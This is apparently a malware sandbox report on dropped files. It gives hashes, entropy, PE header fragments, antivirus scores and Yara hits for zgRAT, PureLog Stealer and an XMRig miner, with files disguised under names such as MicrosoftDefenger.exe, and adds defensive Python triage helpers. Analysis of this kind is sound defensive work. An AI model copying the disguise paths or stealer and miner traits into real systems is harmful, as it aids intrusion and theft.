SSDEEP:3:7k4ty1d9c8qKKSOJrenpCUmazzKdFVxzVVH/avXAry/4fyk9V1k1fzj3JO1tVgA:7XtibTqKKSJnp2mKnVVCIaCezj3kP
MD5:121505A159FAAA411EFD50112B75B55D
SHA1:55BB4F4585A8C5D68DF06F28333B325D65B219A7
SHA-256:1A7BE99A73F12DF405FB871EDCEF678F1B32E28CA670B0DB142F59CC910A227B
SHA-512:80EFFF86556060524FF8839CB0471D3A938E9063DBDF817640A0CE8BD78D3CFF601EBC03D89B2473B01C8F2B1720A07A8C1F04110F1AA2077D0739620563F7F8
Malicious:false
Preview:ktaOoGz5HWwFJvnO28XSAP3cfXPJrYfooWdk6czFnjgVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRobthAzAlBiSCRcKIu7tiO7VweTOjWF0pTEgvlS73PQppbz08mJSVqlDrF6DrkbO5smsN6Zgc90S7SqVpdP6Mwe9sAzppPQSyBt6zGmCNn0V0SFZZlXOVeBJNmAMHt1Mthe6itgi0Ms

Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):3766784
Entropy (8bit):7.8288998084696235
Encrypted:false
SSDEEP:49152:SUZpV+/6tPv1Vjlr1VdlhrnKSiOIwSTLvCGj0oXcR6VQ1oB3RobzRk5A5v4ses:SevbR5ltKSiOIZfC9o63oBKk5A5vD
MD5:BF9DDFDD875FA2BADBE94E88A1FC4214
SHA1:8730687161C402B4586A61968E7BEC1D17B7E29A
SHA-256:8E35B4E95AFF45AC48B79D7359F31CE871B5D952D3C0F51D500929FEE0442D06
SHA-512:B823653024D225B39A609DD844EF203F243A9BDAC1C89FF4EB11C355D09420CEA6EB3B0F713817D65AA506F8F5D0B809EEE3F694F71364D2170403E3980B0BBF
Malicious:true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\INF\MicrosoftDefenger.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\INF\MicrosoftDefenger.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................r9..........9.. ....9...@.. ........................9...........@...................................9.K.....9.p.....................9...................................................... ............... ..H............text....p9.. ...r9................. ..`.rsrc...p.....9......t9.............@....reloc........9......x9.............@..B..................9.....H...................l.............9......................................0..........(.... ........8........E....M...N...).......8H...(.... ....~....{....:....& ....8....(.... ....~....{b...9....& ....8....*(.... ....~....{|...9....& ....8y......0..)....... ........8........E............6...........Z...8....r...ps....z*...... ....~....{q...:....& ....8....8.... ....~....{h...:....& ....8........~....(C...~....(G... ....<.... ....8]...~....:.... ....~....{....:?...& ....84...~.
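The two 3766784-byte records above carry identical hashes (MD5 BF9DDFDD875FA2BADBE94E88A1FC4214, SHA-256 8E35B4E95AFF45AC48B79D7359F31CE871B5D952D3C0F51D500929FEE0442D06), and their Yara hits name C:\Windows\Bridgeprovider.exe and C:\Windows\INF\MicrosoftDefenger.exe: the same zgRAT/PureLog Stealer payload is written to both locations. The helper below is an added example, not Joe Sandbox code. It recomputes the fields this report lists for a dropped file (MD5/SHA1/SHA-256/SHA-512, 8-bit Shannon entropy, PE32 vs. PE32+ and whether the CLR runtime header data directory is set, which is what makes a file a "Mono/.Net assembly") and matches the file's SHA-256 against the dropped-file hashes copied from the records above. The minimal PE image built by build_min_pe() is constructed here only so the helper can be exercised offline; it is not one of the sample's files.

```python
"""Dropped-file triage helper (added example; not Joe Sandbox code)."""
import hashlib
import math
import struct
import sys
from collections import Counter

# SHA-256 values copied from the dropped-file records in this report.
REPORT_SHA256 = {
    "CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4": "Bridgeprovider.exe drop, 70144-byte .NET DLL",
    "B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18": "Bridgeprovider.exe drop, 36352-byte .NET DLL",
    "80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F": "Bridgeprovider.exe drop, 342528-byte .NET DLL",
    "6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F": "Bridgeprovider.exe drop, 89600-byte .NET DLL",
    "8E35B4E95AFF45AC48B79D7359F31CE871B5D952D3C0F51D500929FEE0442D06": "C:\\Windows\\Bridgeprovider.exe and C:\\Windows\\INF\\MicrosoftDefenger.exe (zgRAT / PureLog Stealer)",
}


def hashes(data: bytes) -> dict:
    """Upper-case hex digests in the same four algorithms the report lists."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def entropy8(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_pe(data: bytes) -> str:
    """Return 'not PE', 'PE32' or 'PE32+', with ' .NET' appended when data
    directory 14 (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, the CLR header) is set."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not PE"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "not PE"
    opt = e_lfanew + 4 + 20                      # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:
        kind, dd_off = "PE32", opt + 96          # PE32: data directories start at +96
    elif magic == 0x20B:
        kind, dd_off = "PE32+", opt + 112        # PE32+: data directories start at +112
    else:
        return "not PE"
    num_dirs = struct.unpack_from("<I", data, dd_off - 4)[0]   # NumberOfRvaAndSizes
    if num_dirs > 14 and len(data) >= dd_off + 15 * 8:
        clr_rva, clr_size = struct.unpack_from("<II", data, dd_off + 14 * 8)
        if clr_rva and clr_size:
            kind += " .NET"
    return kind


def triage(data: bytes) -> dict:
    """Recompute the report's per-file fields and look the file up in the IOC set."""
    h = hashes(data)
    return {
        "size": len(data),
        "entropy": round(entropy8(data), 6),
        "type": classify_pe(data),
        "md5": h["md5"],
        "sha256": h["sha256"],
        "known_drop": REPORT_SHA256.get(h["sha256"]),   # None when not in the report
    }


def build_min_pe(dotnet: bool = True) -> bytes:
    """Construct a headers-only PE32 image for offline testing (synthetic, not a real sample)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine=i386, 0 sections, SizeOfOptionalHeader=224, Characteristics
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    # Optional header: magic 0x10B, 90 zero bytes of fields, NumberOfRvaAndSizes=16
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16)
    dirs = [(0, 0)] * 16
    if dotnet:
        dirs[14] = (0x2008, 0x48)                # CLR header RVA/size (values chosen arbitrarily)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    return dos + coff + opt


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, triage(fh.read()))
```

Run it as `python triage.py <file> ...` on the files recovered from an infected host; a SHA-256 hit against REPORT_SHA256 ties the file to this analysis, while a PE32 .NET classification with entropy near 7.8 (the two 3766784-byte records) is the packed-payload profile worth escalating even when the hash is new.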
                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1224
                                                                                                                                                                                                  Entropy (8bit):4.435108676655666
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4608
                                                                                                                                                                                                  Entropy (8bit):3.9313043186404797
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:6IJXPtKM7Jt8Bs3FJsdcV4MKe27QNvqBHqOulajfqXSfbNtm:TPRPc+Vx9MQNvkUcjRzNt
                                                                                                                                                                                                  MD5:6EF2491B34267761F9A9BC17D13C6931
                                                                                                                                                                                                  SHA1:864496FF6F6A1BD1A34A4BD206755E12F8708E4D
                                                                                                                                                                                                  SHA-256:4F7821DC9089BA81122FC1EE8F2C50885ED68E9E6CE4CB98F01B74AE59B0D6CC
                                                                                                                                                                                                  SHA-512:F02BF61C73526B5EEE4B949CC4986751AF30497AA1369D8CA8D051865BAB9B442466234BA20F14784918ED445760ABCC09051B93D00D9076785B44E8AED14EAD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'Vg.............................'... ...@....@.. ....................................@.................................@'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4088537
                                                                                                                                                                                                  Entropy (8bit):7.783200094627012
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:IBJ+UZpV+/6tPv1Vjlr1VdlhrnKSiOIwSTLvCGj0oXcR6VQ1oB3RobzRk5A5v4sO:ycevbR5ltKSiOIZfC9o63oBKk5A5vDE
                                                                                                                                                                                                  MD5:E94C69B02CC5FB2B03FC32AA55760AAF
                                                                                                                                                                                                  SHA1:6B6D2DCC5302F276EF2141AE0CC704590E498874
                                                                                                                                                                                                  SHA-256:26A3EDC7520A5E70960C14EB1E2F8084A5092A8971BF8EE15488816C9B7138C4
                                                                                                                                                                                                  SHA-512:80BFF5037DD8052B1CC99C6174F95D31BF1A4CAFAC224474FF4E74271B5F5DE9C5AB8A6CB4E0BC8E701FAF4B282CBF45FD98BD13A71DE16970040D3747AFEF9D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Tasks\1.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Tasks\1.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5721088
                                                                                                                                                                                                  Entropy (8bit):6.669821521266325
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:IXC8d5L4wN+UIcPXBGHIhZgprpw82OiONkP1v8P6kF+llT5FQ3YeQOaVYd1:P45Lgw8LiONw0P+llT5FCGRVYz
                                                                                                                                                                                                  MD5:93CEEF4357070A8DDC0BEAC173547EC1
                                                                                                                                                                                                  SHA1:1E9BF45A790B5A818730DE750DC6E2FFE6C35F7C
                                                                                                                                                                                                  SHA-256:4D084A7E0C656D038D3176E97A4F807D094CE78F6B1F92A6ADA7B93CF6A7CF03
                                                                                                                                                                                                  SHA-512:611C22D55F2830F0556170144D6E0BE64CF5BBD6EBE80323CF2944FE8860C9BABAC9439BFF75626E10499B012C178FEAE3D80FE9939FEC402115C3F184825CF6
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: Florian Roth
                                                                                                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: ditekSHen
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........z..........p.....p.._....n......n......n.......tg....p.....Dn.....p............En......Dn.....Dn.....Dne..........Dn.....Rich............................PE..d...7A.e..........".......:..>G.....dx6........@..........................................`.................................................|fQ......0........|..............0..L.....N.......................N.(.....N.8............0:.X............................text...|.:.......:................. ..`.rdata...Y...0:..Z....:.............@..@.data.....+...Q......rQ.............@....pdata........|......|R.............@..@_RANDOMXV.....~.......T.............@..`_TEXT_CN.&....~..(....T.............@..`_TEXT_CN..............T.............@..`_RDATA....... ........T.............@..@.rsrc........0........T.............@..@.reloc..L....0........V.............@..B................................
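The record above is worth a second look for two reasons a practitioner would check: its Entropy (8bit) field, and the section names that survive in the hex preview (`_RANDOMX` and `_TEXT_CN`, the RandomX JIT and CryptoNight code sections that XMRig builds carry, right after `.pdata`). The following script is an added example for this report, not Joe Security's code and not bytes from the sample: it recomputes the same 0..8 bits-per-byte Shannon entropy the report prints, walks a PE section table to recover those names, and computes per-section entropy so a packed section stands out. The PE image it operates on is constructed in memory for the demo, and treating the two section names as a miner indicator is this example's assumption, not a rule taken from the report.

```python
"""Added triage helpers for dropped-file records like the ones in this report.

Not Joe Security's code. The PE image built below is synthetic (section
names and sizes are assumptions); the section-name heuristic is an
assumption based on the names visible in the miner's preview above.
"""
import math
import struct
from collections import Counter

# Names seen in the preview of C:\Windows\Tasks\ApplicationsFrameHost.exe.
# Assumption for this example: their presence is an XMRig indicator.
MINER_SECTION_NAMES = {"_RANDOMX", "_TEXT_CN"}

COFF_FMT = "<HHIIIHH"          # IMAGE_FILE_HEADER, 20 bytes
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 for empty input and at most 8.0.
    This is the quantity the report labels "Entropy (8bit)"."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes) -> list:
    """Return [(name, raw_offset, raw_size)] from a PE32/PE32+ section table.
    Raises ValueError if the MZ/PE headers or the table are not intact."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from(COFF_FMT, image, coff)
    table = coff + struct.calcsize(COFF_FMT) + opt_size   # section table follows the optional header
    entry = struct.calcsize(SECTION_FMT)
    out = []
    for i in range(nsec):
        off = table + i * entry
        if off + entry > len(image):
            raise ValueError("section table truncated")
        name, _vsize, _va, raw_size, raw_ptr, *_ = struct.unpack_from(SECTION_FMT, image, off)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size))
    return out


def section_entropies(image: bytes) -> list:
    """[(section name, entropy of its raw bytes)], a packed/encrypted section sits near 8.0."""
    return [(name, shannon_entropy(image[ptr:ptr + size])) for name, ptr, size in pe_sections(image)]


def miner_sections(image: bytes) -> list:
    """Sorted list of section names matching the assumed miner indicator set."""
    return sorted(n for n, _, _ in pe_sections(image) if n in MINER_SECTION_NAMES)


def build_demo_image() -> bytes:
    """Minimal PE32+ image with three sections. Constructed for the demo only."""
    sections = [
        (b".text", b"\x90" * 0x200),              # one byte value only -> entropy 0.0
        (b"_RANDOMX", bytes(range(256)) * 2),     # every byte value equally often -> 8.0
        (b"_TEXT_CN", b"\xcc" * 0x100),
    ]
    opt_size = 240                                # size of a PE32+ optional header
    e_lfanew = 0x40
    hdr_end = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    raw_ptr = (hdr_end + 0x1FF) & ~0x1FF          # first raw section on a 512-byte boundary
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_FMT, 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)   # PE32+ magic, rest zeroed
    table, body, va = b"", b"", 0x1000
    for name, data in sections:
        table += struct.pack(SECTION_FMT, name, len(data), va, len(data),
                             raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += data
        va += 0x1000
    header = dos + b"PE\0\0" + coff + opt + table
    return header.ljust(raw_ptr, b"\0") + body


if __name__ == "__main__":
    img = build_demo_image()
    print("whole-file entropy: %.3f" % shannon_entropy(img))
    for name, ent in section_entropies(img):
        print("%-10s %.3f" % (name, ent))
    print("miner sections:", miner_sections(img))
```

Run it against a real dropped file by replacing `build_demo_image()` with the file's bytes. Two things the records above illustrate about the whole-file number: the report marks a file Encrypted only when its entropy is very close to the 8.0 ceiling (the 8.9 MB and 34 MB drops at 7.993 and 7.998 are flagged, the 4 MB drop at 7.783 is not), and a high-entropy file with no Yara hit and a weak AV score (the 34 MB file at 39%) is exactly the one that needs unpacking and a per-section look rather than a verdict from the hash alone.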
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1936896
                                                                                                                                                                                                  Entropy (8bit):7.195575658711872
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:CkxOm+7TjsPnztyDMma7hZX228vo41ZUKZn:CJotyDIX228vo41Zt
                                                                                                                                                                                                  MD5:58E4115267B276452EDC1F541E3A8198
                                                                                                                                                                                                  SHA1:EC40B6CCE5C9A835563C17DA81997E8010AC9CAD
                                                                                                                                                                                                  SHA-256:713120BAC7807F6FC0A6050135556C0614A66BE2FB476CFE163877F3D03B4D08
                                                                                                                                                                                                  SHA-512:3DEF4B7F7FBEAB01826EB733174BCA64860F8BFBAD3BAEC361B65B07B4558E28830FCC2DEB264622199F9474277F04E562830BC5F0BF8A0E7932D002F1A812C5
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 56%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.bi2..:2..:2..:.b.:3..:t..:...:t..:+..:t..:...:;..::..:;..:3..:;..:...:2..:...:.\.:b..:.\.:3..:?..:3..:2.:3..:.\.:3..:Rich2..:................PE..d...(f ]..........".................,..........@............................. ............`...@...............@.............................h...|................i..............|.......................................p............... ............................text............................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i.......j..................@..@.rsrc.... ...........j..............@..@.reloc..|...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8939797
                                                                                                                                                                                                  Entropy (8bit):7.993167087932813
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:196608:zWvrHlfID0pUzPLhQNQm8NkKeVuWJysVYvsODoyMxxvjDDAxM8DJuqiX:qjHlXpUTLfhJxWJ0oyMxtDDAxM8tu9X
                                                                                                                                                                                                  MD5:92A9C0EF09F955F9F1BCA837D7AA493F
                                                                                                                                                                                                  SHA1:9292E187F09C271393BE635220A75B11C03C469D
                                                                                                                                                                                                  SHA-256:95C101A0164AF189CC282EB2D67E143B42E6D57D7EF396D59715A355A3162B96
                                                                                                                                                                                                  SHA-512:C906DB5CEC598254D5584040B02DFB7B813B94D63AF6AF90F3AB7014A89409677D6CA78D4F544B3415058C09BA6C972E7CF8DA4B1AA04F954A4689B4A70CBF3F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1_..P1..P1..P1..(2..P1..(4.|P1..(5..P1../..P1../4..P1../5..P1../2..P1..(0..P1..P0..P1...5..P1...3..P1.Rich.P1.........................PE..d...c..e.........."....%.....l................@.....................................>....`.....................................................P....`..h.... ..."...........p..\...P...................................@...............x............................text............................... ..`.rdata...).......*..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...h....`......................@..@.reloc..\....p......................@..B................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34208376
                                                                                                                                                                                                  Entropy (8bit):7.9976397266318
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:786432:Oo0DUdQuhK/+CGLuoDarzoMQQC5RxAOd99JW88D/N3R:Oo0DU0e3arzSQCnx9JWxb
                                                                                                                                                                                                  MD5:02484A615E581A9A431E20DF300FAED4
                                                                                                                                                                                                  SHA1:D855E2C9338B1508577B3E831CC89838C2768647
                                                                                                                                                                                                  SHA-256:16D2F6194D1B1989FBEF4572055DBF62A0D6A2570B316AC15722192F1C559A50
                                                                                                                                                                                                  SHA-512:7B69E3E47863EC7EDFA03FA1F25A15C90EE84AEC520FF08D8834B010EB58532F444DAA81056B3DCC7D77F42EB0F390B8490CB59A705FA24B6674A088D796FE57
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-@.`~@.`~@.`~..c.G.`~..e...`~..d.J.`~...~D.`~..e.h.`~..d.Q.`~..c.I.`~..a.K.`~@.a~..`~.d.T.`~.b.A.`~Rich@.`~........................PE..d....)Xe.........."....!.....l................@.............................@......).....`.....................................................x.... ........... ...........0..X... ...................................@............................................text...P........................... ..`.rdata...*.......,..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc........ ......................@..@.reloc..X....0......................@..B................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702912
                                                                                                                                                                                                  Entropy (8bit):6.862639031766079
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:kRaZROMOm8FN7TjsPnzt2heeRhQbJEOeamwdKJeSPu6bMo0E37O9ug+:ikxOm+7TjsPnztyDMmarwJJKZn
                                                                                                                                                                                                  MD5:362FFCE5C7C480702A615F1847191F62
                                                                                                                                                                                                  SHA1:75ACEAEA1DFBA0735212C2AB5CAFC49257927F73
                                                                                                                                                                                                  SHA-256:9E24C7B4604AA3022325B62154AC80DC76533FA96A3418D8E15D28C998FB9C53
                                                                                                                                                                                                  SHA-512:9A71825A4E111C89E193F799F5CD0F38BF753137BF669040254EB5ECFBEB1E7FB161451320592832381B6AE7A95B015EF8E9192AB10AD41E113BAD35DDE7D15F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.bi2..:2..:2..:.b.:3..:t..:...:t..:+..:t..:...:;..::..:;..:3..:;..:...:2..:...:.\.:b..:.\.:3..:?..:3..:2.:3..:.\.:3..:Rich2..:................PE..d......].........."..........t......,..........@.........................................`...@...............@.............................h...|.......t........i..............|.......................................p............... ............................text............................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i.......j..................@..@.rsrc................j..............@..@.reloc..|...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14544
                                                                                                                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):373760
                                                                                                                                                                                                  Entropy (8bit):6.905823705092686
                                                                                                                                                                                                  Encrypted:false
